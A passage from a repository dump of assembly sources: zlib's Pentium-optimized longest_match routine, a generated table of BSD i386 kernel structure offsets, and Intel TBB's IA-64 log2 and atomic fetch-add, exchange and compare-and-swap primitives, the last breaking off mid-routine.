LenMaximum: movl deflatestate(%esp), %edx
movl $MAX_MATCH, bestlen(%esp)
movl %ecx, dsMatchStart(%edx)
/* if ((uInt)best_len <= s->lookahead) return (uInt)best_len; */
/* return s->lookahead; */
LeaveNow:
movl deflatestate(%esp), %edx
movl bestlen(%esp), %ebx
movl dsLookahead(%edx), %eax
cmpl %eax, %ebx
jg LookaheadRet
movl %ebx, %eax
LookaheadRet:
/* Restore the stack and return from whence we came. */
addl $LocalVarsSize, %esp
popl %ebx
popl %esi
popl %edi
popl %ebp
/* match_init is a no-op for this implementation; it shares the ret. */
match_init: ret
|
AIFM-sys/AIFM
| 10,817
|
shenango/apps/parsec/pkgs/libs/zlib/src/contrib/asm586/match.S
|
/* match.s -- Pentium-optimized version of longest_match()
 * Written for zlib 1.1.2
 * Copyright (C) 1998 Brian Raiter <breadbox@muppetlabs.com>
 *
 * This is free software; you can redistribute it and/or modify it
 * under the terms of the GNU General Public License.
 */
/* NOTE(review): 32-bit x86, GNU as, AT&T syntax, cdecl calling convention.
 * Variant of the 686 version scheduled for the original Pentium's U/V
 * dual-issue pipes (see the pairing comments in the inner loop below).
 */
#ifndef NO_UNDERLINE
#define match_init _match_init
#define longest_match _longest_match
#endif
#define MAX_MATCH (258)
#define MIN_MATCH (3)
#define MIN_LOOKAHEAD (MAX_MATCH + MIN_MATCH + 1)
#define MAX_MATCH_8 ((MAX_MATCH + 7) & ~7)
/* stack frame offsets */
/* Unlike the 686 version, this one packs (chainlen << 16) | scanend in one
 * slot and keeps wmask in its own local.
 */
#define wmask 0 /* local copy of s->wmask */
#define window 4 /* local copy of s->window */
#define windowbestlen 8 /* s->window + bestlen */
#define chainlenscanend 12 /* high word: current chain len */
/* low word: last bytes sought */
#define scanstart 16 /* first two bytes of string */
#define scanalign 20 /* dword-misalignment of string */
#define nicematch 24 /* a good enough match size */
#define bestlen 28 /* size of best match so far */
#define scan 32 /* ptr to string wanting match */
#define LocalVarsSize (36)
/* saved ebx 36 */
/* saved edi 40 */
/* saved esi 44 */
/* saved ebp 48 */
/* return address 52 */
#define deflatestate 56 /* the function arguments */
#define curmatch 60
/* Offsets for fields in the deflate_state structure. These numbers
 * are calculated from the definition of deflate_state, with the
 * assumption that the compiler will dword-align the fields. (Thus,
 * changing the definition of deflate_state could easily cause this
 * program to crash horribly, without so much as a warning at
 * compile time. Sigh.)
 */
/* All the +zlib1222add offsets are due to the addition of fields
 * in zlib in the deflate_state structure since the asm code was first written
 * (if you compile with zlib 1.0.4 or older, use "zlib1222add equ (-4)").
 * (if you compile with zlib between 1.0.5 and 1.2.2.1, use "zlib1222add equ 0").
 * if you compile with zlib 1.2.2.2 or later , use "zlib1222add equ 8").
 */
#define zlib1222add (8)
#define dsWSize (36+zlib1222add)
#define dsWMask (44+zlib1222add)
#define dsWindow (48+zlib1222add)
#define dsPrev (56+zlib1222add)
#define dsMatchLen (88+zlib1222add)
#define dsPrevMatch (92+zlib1222add)
#define dsStrStart (100+zlib1222add)
#define dsMatchStart (104+zlib1222add)
#define dsLookahead (108+zlib1222add)
#define dsPrevLen (112+zlib1222add)
#define dsMaxChainLen (116+zlib1222add)
#define dsGoodMatch (132+zlib1222add)
#define dsNiceMatch (136+zlib1222add)
.file "match.S"
.globl match_init, longest_match
.text
/* uInt longest_match(deflate_state *deflatestate, IPos curmatch) */
/*
 * Pentium (586) scheduling of the same algorithm as the 686 version:
 * walk the s->prev hash chain from curmatch looking for the longest
 * match of the string at s->window + s->strstart.
 *
 * In (stack, cdecl): deflatestate = deflate_state*, curmatch = IPos
 * Out:   %eax = best match length found, capped at s->lookahead
 * Side:  s->match_start is updated whenever a longer match is recorded
 */
longest_match:
/* Save registers that the compiler may be using, and adjust %esp to */
/* make room for our stack frame. */
pushl %ebp
pushl %edi
pushl %esi
pushl %ebx
subl $LocalVarsSize, %esp
/* Retrieve the function arguments. %ecx will hold cur_match */
/* throughout the entire function. %edx will hold the pointer to the */
/* deflate_state structure during the function's setup (before */
/* entering the main loop). */
movl deflatestate(%esp), %edx
movl curmatch(%esp), %ecx
/* if ((uInt)nice_match > s->lookahead) nice_match = s->lookahead; */
movl dsNiceMatch(%edx), %eax
movl dsLookahead(%edx), %ebx
cmpl %eax, %ebx
jl LookaheadLess
movl %eax, %ebx
LookaheadLess: movl %ebx, nicematch(%esp)
/* register Bytef *scan = s->window + s->strstart; */
movl dsWindow(%edx), %esi
movl %esi, window(%esp)
movl dsStrStart(%edx), %ebp
lea (%esi,%ebp), %edi
movl %edi, scan(%esp)
/* Determine how many bytes the scan ptr is off from being */
/* dword-aligned. */
movl %edi, %eax
negl %eax
andl $3, %eax
movl %eax, scanalign(%esp)
/* IPos limit = s->strstart > (IPos)MAX_DIST(s) ? */
/*     s->strstart - (IPos)MAX_DIST(s) : NIL; */
movl dsWSize(%edx), %eax
subl $MIN_LOOKAHEAD, %eax
subl %eax, %ebp
jg LimitPositive
xorl %ebp, %ebp
LimitPositive:
/* unsigned chain_length = s->max_chain_length; */
/* if (s->prev_length >= s->good_match) { */
/*     chain_length >>= 2; */
/* } */
/* NOTE: the intervening movl does not touch EFLAGS, so the jl still */
/* tests prev_length vs good_match. */
movl dsPrevLen(%edx), %eax
movl dsGoodMatch(%edx), %ebx
cmpl %ebx, %eax
movl dsMaxChainLen(%edx), %ebx
jl LastMatchGood
shrl $2, %ebx
LastMatchGood:
/* chainlen is decremented once beforehand so that the function can */
/* use the sign flag instead of the zero flag for the exit test. */
/* It is then shifted into the high word, to make room for the scanend */
/* scanend value, which it will always accompany. */
decl %ebx
shll $16, %ebx
/* int best_len = s->prev_length; */
movl dsPrevLen(%edx), %eax
movl %eax, bestlen(%esp)
/* Store the sum of s->window + best_len in %esi locally, and in */
/* windowbestlen(%esp) on the stack. */
addl %eax, %esi
movl %esi, windowbestlen(%esp)
/* register ush scan_start = *(ushf*)scan; */
/* register ush scan_end = *(ushf*)(scan+best_len-1); */
/* scan_end lands in %bx, below the chainlen already shifted into the */
/* high word of %ebx -- together they form chainlenscanend. */
movw (%edi), %bx
movw %bx, scanstart(%esp)
movw -1(%edi,%eax), %bx
movl %ebx, chainlenscanend(%esp)
/* Posf *prev = s->prev; */
/* uInt wmask = s->w_mask; */
movl dsPrev(%edx), %edi
movl dsWMask(%edx), %edx
mov %edx, wmask(%esp)
/* Jump into the main loop. */
jmp LoopEntry
.balign 16
/* do {
 * match = s->window + cur_match;
 * if (*(ushf*)(match+best_len-1) != scan_end ||
 * *(ushf*)match != scan_start) continue;
 * [...]
 * } while ((cur_match = prev[cur_match & wmask]) > limit
 * && --chain_length != 0);
 *
 * Here is the inner loop of the function. The function will spend the
 * majority of its time in this loop, and majority of that time will
 * be spent in the first ten instructions.
 *
 * Within this loop:
 * %ebx = chainlenscanend - i.e., ((chainlen << 16) | scanend)
 * %ecx = curmatch
 * %edx = curmatch & wmask
 * %esi = windowbestlen - i.e., (window + bestlen)
 * %edi = prev
 * %ebp = limit
 *
 * Two optimization notes on the choice of instructions:
 *
 * The first instruction uses a 16-bit address, which costs an extra,
 * unpairable cycle. This is cheaper than doing a 32-bit access and
 * zeroing the high word, due to the 3-cycle misalignment penalty which
 * would occur half the time. This also turns out to be cheaper than
 * doing two separate 8-bit accesses, as the memory is so rarely in the
 * L1 cache.
 *
 * The window buffer, however, apparently spends a lot of time in the
 * cache, and so it is faster to retrieve the word at the end of the
 * match string with two 8-bit loads. The instructions that test the
 * word at the beginning of the match string, however, are executed
 * much less frequently, and there it was cheaper to use 16-bit
 * instructions, which avoided the necessity of saving off and
 * subsequently reloading one of the other registers.
 */
LookupLoop:
/* 1 U & V */
movw (%edi,%edx,2), %cx /* 2 U pipe */
movl wmask(%esp), %edx /* 2 V pipe */
cmpl %ebp, %ecx /* 3 U pipe */
jbe LeaveNow /* 3 V pipe */
subl $0x00010000, %ebx /* 4 U pipe */
js LeaveNow /* 4 V pipe */
LoopEntry: movb -1(%esi,%ecx), %al /* 5 U pipe */
andl %ecx, %edx /* 5 V pipe */
cmpb %bl, %al /* 6 U pipe */
jnz LookupLoop /* 6 V pipe */
movb (%esi,%ecx), %ah
cmpb %bh, %ah
jnz LookupLoop
movl window(%esp), %eax
movw (%eax,%ecx), %ax
cmpw scanstart(%esp), %ax
jnz LookupLoop
/* Store the current value of chainlen. */
movl %ebx, chainlenscanend(%esp)
/* Point %edi to the string under scrutiny, and %esi to the string we */
/* are hoping to match it up with. In actuality, %esi and %edi are */
/* both pointed (MAX_MATCH_8 - scanalign) bytes ahead, and %edx is */
/* initialized to -(MAX_MATCH_8 - scanalign). */
movl window(%esp), %esi
movl scan(%esp), %edi
addl %ecx, %esi
movl scanalign(%esp), %eax
movl $(-MAX_MATCH_8), %edx
lea MAX_MATCH_8(%edi,%eax), %edi
lea MAX_MATCH_8(%esi,%eax), %esi
/* Test the strings for equality, 8 bytes at a time. At the end,
 * adjust %edx so that it is offset to the exact byte that mismatched.
 *
 * We already know at this point that the first three bytes of the
 * strings match each other, and they can be safely passed over before
 * starting the compare loop. So what this code does is skip over 0-3
 * bytes, as much as necessary in order to dword-align the %edi
 * pointer. (%esi will still be misaligned three times out of four.)
 *
 * It should be confessed that this loop usually does not represent
 * much of the total running time. Replacing it with a more
 * straightforward "rep cmpsb" would not drastically degrade
 * performance.
 */
LoopCmps:
movl (%esi,%edx), %eax
movl (%edi,%edx), %ebx
xorl %ebx, %eax /* nonzero iff the two dwords differ */
jnz LeaveLoopCmps
movl 4(%esi,%edx), %eax
movl 4(%edi,%edx), %ebx
xorl %ebx, %eax
jnz LeaveLoopCmps4
addl $8, %edx
jnz LoopCmps
jmp LenMaximum
LeaveLoopCmps4: addl $4, %edx
LeaveLoopCmps: testl $0x0000FFFF, %eax
jnz LenLower
addl $2, %edx
shrl $16, %eax
/* subb/adcl pair: carry is set iff the low mismatch byte was zero, */
/* i.e. the mismatch is in the high byte -- bumps %edx by one more. */
LenLower: subb $1, %al
adcl $0, %edx
/* Calculate the length of the match. If it is longer than MAX_MATCH, */
/* then automatically accept it as the best possible match and leave. */
lea (%edi,%edx), %eax
movl scan(%esp), %edi
subl %edi, %eax
cmpl $MAX_MATCH, %eax
jge LenMaximum
/* If the length of the match is not longer than the best match we */
/* have so far, then forget it and return to the lookup loop. */
movl deflatestate(%esp), %edx
movl bestlen(%esp), %ebx
cmpl %ebx, %eax
jg LongerMatch
movl chainlenscanend(%esp), %ebx
movl windowbestlen(%esp), %esi
movl dsPrev(%edx), %edi
movl wmask(%esp), %edx
andl %ecx, %edx
jmp LookupLoop
/* s->match_start = cur_match; */
/* best_len = len; */
/* if (len >= nice_match) break; */
/* scan_end = *(ushf*)(scan+best_len-1); */
LongerMatch: movl nicematch(%esp), %ebx
movl %eax, bestlen(%esp)
movl %ecx, dsMatchStart(%edx)
cmpl %ebx, %eax
jge LeaveNow
movl window(%esp), %esi
addl %eax, %esi
movl %esi, windowbestlen(%esp)
movl chainlenscanend(%esp), %ebx
movw -1(%edi,%eax), %bx /* %edi still = scan here: reload scan_end */
movl dsPrev(%edx), %edi
movl %ebx, chainlenscanend(%esp)
movl wmask(%esp), %edx
andl %ecx, %edx
jmp LookupLoop
/* Accept the current string, with the maximum possible length. */
LenMaximum: movl deflatestate(%esp), %edx
movl $MAX_MATCH, bestlen(%esp)
movl %ecx, dsMatchStart(%edx)
/* if ((uInt)best_len <= s->lookahead) return (uInt)best_len; */
/* return s->lookahead; */
LeaveNow:
movl deflatestate(%esp), %edx
movl bestlen(%esp), %ebx
movl dsLookahead(%edx), %eax
cmpl %eax, %ebx
jg LookaheadRet
movl %ebx, %eax
LookaheadRet:
/* Restore the stack and return from whence we came. */
addl $LocalVarsSize, %esp
popl %ebx
popl %esi
popl %edi
popl %ebp
/* match_init is a no-op for this implementation; it shares the ret. */
match_init: ret
|
AIFM-sys/AIFM
| 2,751
|
shenango/apps/parsec/pkgs/libs/uptcpip/src/include/opt/bsd_assym.s
|
/*
 * Machine-generated (genassym-style) constant definitions for i386 BSD
 * kernel assembly: C structure field offsets, segment selectors, and
 * limits exported as cpp macros so .s sources stay in sync with the C
 * headers.
 * NOTE(review): every value below encodes a struct layout or ABI detail
 * and is presumably regenerated by the build — do not hand-edit values;
 * confirm against the generating C headers.
 */
/* boot-time 32-bit code segment selector */
#define BC32SEL 0x68
/* struct bootinfo field offsets (BI_*) and total size */
#define BI_ENDCOMMON 0xc
#define BI_ESYMTAB 0x44
#define BI_KERNELNAME 0x4
#define BI_KERNEND 0x48
#define BI_NFS_DISKLESS 0x8
#define BI_SIZE 0x30
#define BI_SYMTAB 0x40
#define BI_VERSION 0x0
#define BOOTINFO_SIZE 0x54
/* errno values referenced from assembly */
#define EFAULT 0xe
#define ENAMETOOLONG 0x3f
#define ENOENT 0x2
/* GDT selectors and kernel address-space constants */
#define GPROC0_SEL 0x9
#define KCSEL 0x20
#define KDSEL 0x28
#define KERNBASE 0xc0000000
#define KERNLOAD 0x400000
#define KPSEL 0x8
#define KSTACK_PAGES 0x2
/* local APIC register offsets (LA_*) — presumably apicreg.h; confirm */
#define LA_EOI 0xb0
#define LA_ICR_HI 0x310
#define LA_ICR_LO 0x300
#define LA_ISR 0x100
#define LA_SVR 0xf0
#define LA_TPR 0x80
#define LA_VER 0x30
/* assorted kernel limits */
#define MAXCOMLEN 0x13
#define MAXCPU 0x20
#define MAXPATHLEN 0x400
#define MCLBYTES 0x800
#define MD_LDT 0x0
#define NFSDISKLESS_SIZE 0x220
/* i386 page-table geometry */
#define NPDEPG 0x400
#define NPDEPTD 0x400
#define NPGPTD 0x1
#define NPTEPG 0x400
#define PAGE_MASK 0xfff
#define PAGE_SHIFT 0xc
#define PAGE_SIZE 0x1000
/* struct pcb (process control block) field offsets */
#define PCB_CR3 0x0
#define PCB_DBREGS 0x2
#define PCB_DR0 0x1c
#define PCB_DR1 0x20
#define PCB_DR2 0x24
#define PCB_DR3 0x28
#define PCB_DR6 0x2c
#define PCB_DR7 0x30
#define PCB_EBP 0xc
#define PCB_EBX 0x14
#define PCB_EDI 0x4
#define PCB_EIP 0x18
#define PCB_ESI 0x8
#define PCB_ESP 0x10
#define PCB_EXT 0x260
#define PCB_FLAGS 0x244
#define PCB_FSD 0x250
#define PCB_GS 0x24c
#define PCB_ONFAULT 0x248
#define PCB_PSL 0x264
#define PCB_SAVEFPU_SIZE 0x200
#define PCB_SAVEFPU 0x40
#define PCB_SIZE 0x270
#define PCB_VM86CALL 0x10
#define PCB_VM86 0x268
/* per-CPU (struct pcpu) field offsets */
#define PC_COMMON_TSSD 0x270
#define PC_COMMON_TSS 0x208
#define PC_CPUID 0x20
#define PC_CURPCB 0x10
#define PC_CURPMAP 0x204
#define PC_CURRENTLDT 0x280
#define PC_CURTHREAD 0x0
#define PC_FPCURTHREAD 0x8
#define PC_FSGS_GDT 0x27c
#define PC_IDLETHREAD 0x4
#define PC_PRIVATE_TSS 0x28c
#define PC_PRVSPACE 0x200
#define PC_SIZEOF 0x300
#define PC_TSS_GDT 0x278
/* paging entry sizes/shifts and struct proc offsets */
#define PDESHIFT 0x2
#define PDESIZE 0x4
#define PDRMASK 0x3fffff
#define PDRSHIFT 0x16
#define PMC_FN_USER_CALLCHAIN 0x9
#define PM_ACTIVE 0x20
#define PTESHIFT 0x2
#define PTESIZE 0x4
#define P_MD 0x254
#define P_VMSPACE 0xd4
/* signal frame field offsets */
#define SIGF_HANDLER 0x10
#define SIGF_UC4 0x14
#define SIGF_UC 0x20
/* struct thread flags and field offsets */
#define TDF_ASTPENDING 0x800
#define TDF_NEEDRESCHED 0x10000
#define TDP_CALLCHAIN 0x400000
#define TD_FLAGS 0x70
#define TD_LOCK 0x0
#define TD_MD 0x1ec
#define TD_PCB 0x19c
#define TD_PFLAGS 0x78
#define TD_PROC 0x4
#define TD_TID 0x3c
/* trapframe field offsets */
#define TF_CS 0x38
#define TF_EFLAGS 0x3c
#define TF_EIP 0x34
#define TF_ERR 0x30
#define TF_TRAPNO 0x2c
/* TSS and ucontext field offsets */
#define TSS_ESP0 0x4
#define UC4_EFLAGS 0x54
#define UC4_GS 0x14
#define UC_EFLAGS 0x54
#define UC_GS 0x14
/* user VA limits and vm86 frame size */
#define USRSTACK 0xbfc00000
#define VM86_FRAMESIZE 0x58
#define VM_MAXUSER_ADDRESS 0xbfc00000
#define VM_PMAP 0xb0
/* event counters (presumably struct vmmeter offsets — confirm) */
#define V_INTR 0xc
#define V_SYSCALL 0x8
#define V_TRAP 0x4
|
AIFM-sys/AIFM
| 2,107
|
shenango/apps/parsec/pkgs/libs/tbblib/src/src/tbb/ia64-gas/log2.s
|
// Copyright 2005-2010 Intel Corporation. All Rights Reserved.
//
// This file is part of Threading Building Blocks.
//
// Threading Building Blocks is free software; you can redistribute it
// and/or modify it under the terms of the GNU General Public License
// version 2 as published by the Free Software Foundation.
//
// Threading Building Blocks is distributed in the hope that it will be
// useful, but WITHOUT ANY WARRANTY; without even the implied warranty
// of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
// GNU General Public License for more details.
//
// You should have received a copy of the GNU General Public License
// along with Threading Building Blocks; if not, write to the Free Software
// Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
//
// As a special exception, you may use this file as part of a free software
// library without restriction. Specifically, if other files instantiate
// templates or use macros or inline functions from this file, or you compile
// this file and link it with other files to produce an executable, this
// file does not by itself cause the resulting executable to be covered by
// the GNU General Public License. This exception does not however
// invalidate any other reasons why the executable file might be covered by
// the GNU General Public License.
// Support for class ConcurrentVector
.section .text
.align 16
// unsigned long __TBB_machine_lg( unsigned long x );
// r32 = x
// Returns floor(log2(x)) in r8 (x assumed non-zero): successive
// shift-and-OR steps smear the most significant set bit of x down into
// every lower bit position; popcnt of that mask, minus 1, is the index
// of the MSB.
.proc __TBB_machine_lg#
.global __TBB_machine_lg#
__TBB_machine_lg:
shr r16=r32,1 // r16 = x >> 1
;;
shr r17=r32,2 // ..x
or r32=r32,r16 // top 2 bits below MSB now set
;;
shr r16=r32,3 // ...xx
or r32=r32,r17 // xxx
;;
shr r17=r32,5 // .....xxx
or r32=r32,r16 // xxxxx
;;
shr r16=r32,8 // ........xxxxx
or r32=r32,r17 // xxxxxxxx
;;
shr r17=r32,13
or r32=r32,r16 // 13x
;;
shr r16=r32,21
or r32=r32,r17 // 21x
;;
shr r17=r32,34
or r32=r32,r16 // 34x
;;
shr r16=r32,55
or r32=r32,r17 // 55x
;;
or r32=r32,r16 // 64x: every bit at or below the MSB is now 1
;;
popcnt r8=r32 // set-bit count = MSB index + 1
;;
add r8=-1,r8 // r8 = floor(log2(x))
br.ret.sptk.many b0
.endp __TBB_machine_lg#
|
AIFM-sys/AIFM
| 15,888
|
shenango/apps/parsec/pkgs/libs/tbblib/src/src/tbb/ia64-gas/atomic_support.s
|
// Copyright 2005-2010 Intel Corporation. All Rights Reserved.
//
// This file is part of Threading Building Blocks.
//
// Threading Building Blocks is free software; you can redistribute it
// and/or modify it under the terms of the GNU General Public License
// version 2 as published by the Free Software Foundation.
//
// Threading Building Blocks is distributed in the hope that it will be
// useful, but WITHOUT ANY WARRANTY; without even the implied warranty
// of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
// GNU General Public License for more details.
//
// You should have received a copy of the GNU General Public License
// along with Threading Building Blocks; if not, write to the Free Software
// Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
//
// As a special exception, you may use this file as part of a free software
// library without restriction. Specifically, if other files instantiate
// templates or use macros or inline functions from this file, or you compile
// this file and link it with other files to produce an executable, this
// file does not by itself cause the resulting executable to be covered by
// the GNU General Public License. This exception does not however
// invalidate any other reasons why the executable file might be covered by
// the GNU General Public License.
// DO NOT EDIT - AUTOMATICALLY GENERATED FROM tools/generate_atomic/ipf_generate.sh
# 1 "<stdin>"
# 1 "<built-in>"
# 1 "<command line>"
# 1 "<stdin>"
.section .text
.align 16
// Byte fetch-and-add, full-fence variant: r32 = address, r33 = addend;
// returns the previous value in r8. Issues a full memory fence, then
// falls through to the acquire implementation.
.proc __TBB_machine_fetchadd1__TBB_full_fence#
.global __TBB_machine_fetchadd1__TBB_full_fence#
__TBB_machine_fetchadd1__TBB_full_fence:
{
mf
br __TBB_machine_fetchadd1acquire
}
.endp __TBB_machine_fetchadd1__TBB_full_fence#
// Byte fetch-and-add with acquire semantics via a cmpxchg retry loop.
.proc __TBB_machine_fetchadd1acquire#
.global __TBB_machine_fetchadd1acquire#
__TBB_machine_fetchadd1acquire:
ld1 r9=[r32] // r9 = current value (CAS expected value)
;;
Retry_1acquire:
mov ar.ccv=r9 // comparand for cmpxchg
mov r8=r9; // r8 = value to return on success
add r10=r9,r33 // r10 = proposed new value
;;
cmpxchg1.acq r9=[r32],r10,ar.ccv // r9 = value actually observed
;;
cmp.ne p7,p0=r8,r9 // observed != expected -> lost the race
(p7) br.cond.dpnt Retry_1acquire
br.ret.sptk.many b0 // previous value in r8
# 49 "<stdin>"
.endp __TBB_machine_fetchadd1acquire#
# 62 "<stdin>"
.section .text
.align 16
// Byte fetch-and-store, full-fence variant: fence, then atomic exchange.
.proc __TBB_machine_fetchstore1__TBB_full_fence#
.global __TBB_machine_fetchstore1__TBB_full_fence#
__TBB_machine_fetchstore1__TBB_full_fence:
mf
;;
xchg1 r8=[r32],r33 // r8 = old value, [r32] = r33
br.ret.sptk.many b0
.endp __TBB_machine_fetchstore1__TBB_full_fence#
// Byte fetch-and-store, acquire variant (bare atomic exchange).
.proc __TBB_machine_fetchstore1acquire#
.global __TBB_machine_fetchstore1acquire#
__TBB_machine_fetchstore1acquire:
xchg1 r8=[r32],r33
br.ret.sptk.many b0
.endp __TBB_machine_fetchstore1acquire#
# 88 "<stdin>"
.section .text
.align 16
// Byte compare-and-swap, full-fence variant: fence, then acquire CAS.
.proc __TBB_machine_cmpswp1__TBB_full_fence#
.global __TBB_machine_cmpswp1__TBB_full_fence#
__TBB_machine_cmpswp1__TBB_full_fence:
{
mf
br __TBB_machine_cmpswp1acquire
}
.endp __TBB_machine_cmpswp1__TBB_full_fence#
// Byte CAS with acquire semantics: r32 = address, r33 = new value,
// r34 = comparand; returns the previous value in r8.
.proc __TBB_machine_cmpswp1acquire#
.global __TBB_machine_cmpswp1acquire#
__TBB_machine_cmpswp1acquire:
zxt1 r34=r34 // zero-extend comparand to register width
;;
mov ar.ccv=r34
;;
cmpxchg1.acq r8=[r32],r33,ar.ccv
br.ret.sptk.many b0
.endp __TBB_machine_cmpswp1acquire#
// DO NOT EDIT - AUTOMATICALLY GENERATED FROM tools/generate_atomic/ipf_generate.sh
# 1 "<stdin>"
# 1 "<built-in>"
# 1 "<command line>"
# 1 "<stdin>"
.section .text
.align 16
// 16-bit fetch-and-add, full-fence variant: r32 = address, r33 = addend;
// returns the previous value in r8. Fence, then reuse the acquire path.
.proc __TBB_machine_fetchadd2__TBB_full_fence#
.global __TBB_machine_fetchadd2__TBB_full_fence#
__TBB_machine_fetchadd2__TBB_full_fence:
{
mf
br __TBB_machine_fetchadd2acquire
}
.endp __TBB_machine_fetchadd2__TBB_full_fence#
// 16-bit fetch-and-add with acquire semantics via a cmpxchg retry loop.
.proc __TBB_machine_fetchadd2acquire#
.global __TBB_machine_fetchadd2acquire#
__TBB_machine_fetchadd2acquire:
ld2 r9=[r32] // r9 = current value (CAS expected value)
;;
Retry_2acquire:
mov ar.ccv=r9 // comparand for cmpxchg
mov r8=r9; // r8 = value to return on success
add r10=r9,r33 // r10 = proposed new value
;;
cmpxchg2.acq r9=[r32],r10,ar.ccv // r9 = value actually observed
;;
cmp.ne p7,p0=r8,r9 // observed != expected -> lost the race
(p7) br.cond.dpnt Retry_2acquire
br.ret.sptk.many b0 // previous value in r8
# 49 "<stdin>"
.endp __TBB_machine_fetchadd2acquire#
# 62 "<stdin>"
.section .text
.align 16
// 16-bit fetch-and-store, full-fence variant: fence, then exchange.
.proc __TBB_machine_fetchstore2__TBB_full_fence#
.global __TBB_machine_fetchstore2__TBB_full_fence#
__TBB_machine_fetchstore2__TBB_full_fence:
mf
;;
xchg2 r8=[r32],r33 // r8 = old value, [r32] = r33
br.ret.sptk.many b0
.endp __TBB_machine_fetchstore2__TBB_full_fence#
// 16-bit fetch-and-store, acquire variant (bare atomic exchange).
.proc __TBB_machine_fetchstore2acquire#
.global __TBB_machine_fetchstore2acquire#
__TBB_machine_fetchstore2acquire:
xchg2 r8=[r32],r33
br.ret.sptk.many b0
.endp __TBB_machine_fetchstore2acquire#
# 88 "<stdin>"
.section .text
.align 16
// 16-bit compare-and-swap, full-fence variant: fence, then acquire CAS.
.proc __TBB_machine_cmpswp2__TBB_full_fence#
.global __TBB_machine_cmpswp2__TBB_full_fence#
__TBB_machine_cmpswp2__TBB_full_fence:
{
mf
br __TBB_machine_cmpswp2acquire
}
.endp __TBB_machine_cmpswp2__TBB_full_fence#
// 16-bit CAS with acquire semantics: r32 = address, r33 = new value,
// r34 = comparand; returns the previous value in r8.
.proc __TBB_machine_cmpswp2acquire#
.global __TBB_machine_cmpswp2acquire#
__TBB_machine_cmpswp2acquire:
zxt2 r34=r34 // zero-extend comparand to register width
;;
mov ar.ccv=r34
;;
cmpxchg2.acq r8=[r32],r33,ar.ccv
br.ret.sptk.many b0
.endp __TBB_machine_cmpswp2acquire#
// DO NOT EDIT - AUTOMATICALLY GENERATED FROM tools/generate_atomic/ipf_generate.sh
# 1 "<stdin>"
# 1 "<built-in>"
# 1 "<command line>"
# 1 "<stdin>"
.section .text
.align 16
// 32-bit fetch-and-add, full-fence variant: r32 = address, r33 = addend;
// returns the previous value in r8. Fence, then reuse the acquire path.
.proc __TBB_machine_fetchadd4__TBB_full_fence#
.global __TBB_machine_fetchadd4__TBB_full_fence#
__TBB_machine_fetchadd4__TBB_full_fence:
{
mf
br __TBB_machine_fetchadd4acquire
}
.endp __TBB_machine_fetchadd4__TBB_full_fence#
// 32-bit fetch-and-add with acquire semantics. Addends of +1/-1 take a
// fast path using the native fetchadd4 instruction; anything else goes
// through a cmpxchg retry loop.
.proc __TBB_machine_fetchadd4acquire#
.global __TBB_machine_fetchadd4acquire#
__TBB_machine_fetchadd4acquire:
cmp.eq p6,p0=1,r33 // addend == +1 ?
cmp.eq p8,p0=-1,r33 // addend == -1 ?
(p6) br.cond.dptk Inc_4acquire
(p8) br.cond.dpnt Dec_4acquire
;;
ld4 r9=[r32] // r9 = current value (CAS expected value)
;;
Retry_4acquire:
mov ar.ccv=r9 // comparand for cmpxchg
mov r8=r9; // r8 = value to return on success
add r10=r9,r33 // r10 = proposed new value
;;
cmpxchg4.acq r9=[r32],r10,ar.ccv // r9 = value actually observed
;;
cmp.ne p7,p0=r8,r9 // observed != expected -> lost the race
(p7) br.cond.dpnt Retry_4acquire
br.ret.sptk.many b0 // previous value in r8
Inc_4acquire:
fetchadd4.acq r8=[r32],1
br.ret.sptk.many b0
Dec_4acquire:
fetchadd4.acq r8=[r32],-1
br.ret.sptk.many b0
.endp __TBB_machine_fetchadd4acquire#
# 62 "<stdin>"
.section .text
.align 16
// 32-bit fetch-and-store, full-fence variant: fence, then exchange.
.proc __TBB_machine_fetchstore4__TBB_full_fence#
.global __TBB_machine_fetchstore4__TBB_full_fence#
__TBB_machine_fetchstore4__TBB_full_fence:
mf
;;
xchg4 r8=[r32],r33 // r8 = old value, [r32] = r33
br.ret.sptk.many b0
.endp __TBB_machine_fetchstore4__TBB_full_fence#
// 32-bit fetch-and-store, acquire variant (bare atomic exchange).
.proc __TBB_machine_fetchstore4acquire#
.global __TBB_machine_fetchstore4acquire#
__TBB_machine_fetchstore4acquire:
xchg4 r8=[r32],r33
br.ret.sptk.many b0
.endp __TBB_machine_fetchstore4acquire#
# 88 "<stdin>"
.section .text
.align 16
// 32-bit compare-and-swap, full-fence variant: fence, then acquire CAS.
.proc __TBB_machine_cmpswp4__TBB_full_fence#
.global __TBB_machine_cmpswp4__TBB_full_fence#
__TBB_machine_cmpswp4__TBB_full_fence:
{
mf
br __TBB_machine_cmpswp4acquire
}
.endp __TBB_machine_cmpswp4__TBB_full_fence#
// 32-bit CAS with acquire semantics: r32 = address, r33 = new value,
// r34 = comparand; returns the previous value in r8.
.proc __TBB_machine_cmpswp4acquire#
.global __TBB_machine_cmpswp4acquire#
__TBB_machine_cmpswp4acquire:
zxt4 r34=r34 // zero-extend comparand to register width
;;
mov ar.ccv=r34
;;
cmpxchg4.acq r8=[r32],r33,ar.ccv
br.ret.sptk.many b0
.endp __TBB_machine_cmpswp4acquire#
// DO NOT EDIT - AUTOMATICALLY GENERATED FROM tools/generate_atomic/ipf_generate.sh
# 1 "<stdin>"
# 1 "<built-in>"
# 1 "<command line>"
# 1 "<stdin>"
.section .text
.align 16
// 64-bit fetch-and-add, full-fence variant: r32 = address, r33 = addend;
// returns the previous value in r8. Fence, then reuse the acquire path.
.proc __TBB_machine_fetchadd8__TBB_full_fence#
.global __TBB_machine_fetchadd8__TBB_full_fence#
__TBB_machine_fetchadd8__TBB_full_fence:
{
mf
br __TBB_machine_fetchadd8acquire
}
.endp __TBB_machine_fetchadd8__TBB_full_fence#
// 64-bit fetch-and-add with acquire semantics. Addends of +1/-1 take a
// fast path using the native fetchadd8 instruction; anything else goes
// through a cmpxchg retry loop.
.proc __TBB_machine_fetchadd8acquire#
.global __TBB_machine_fetchadd8acquire#
__TBB_machine_fetchadd8acquire:
cmp.eq p6,p0=1,r33 // addend == +1 ?
cmp.eq p8,p0=-1,r33 // addend == -1 ?
(p6) br.cond.dptk Inc_8acquire
(p8) br.cond.dpnt Dec_8acquire
;;
ld8 r9=[r32] // r9 = current value (CAS expected value)
;;
Retry_8acquire:
mov ar.ccv=r9 // comparand for cmpxchg
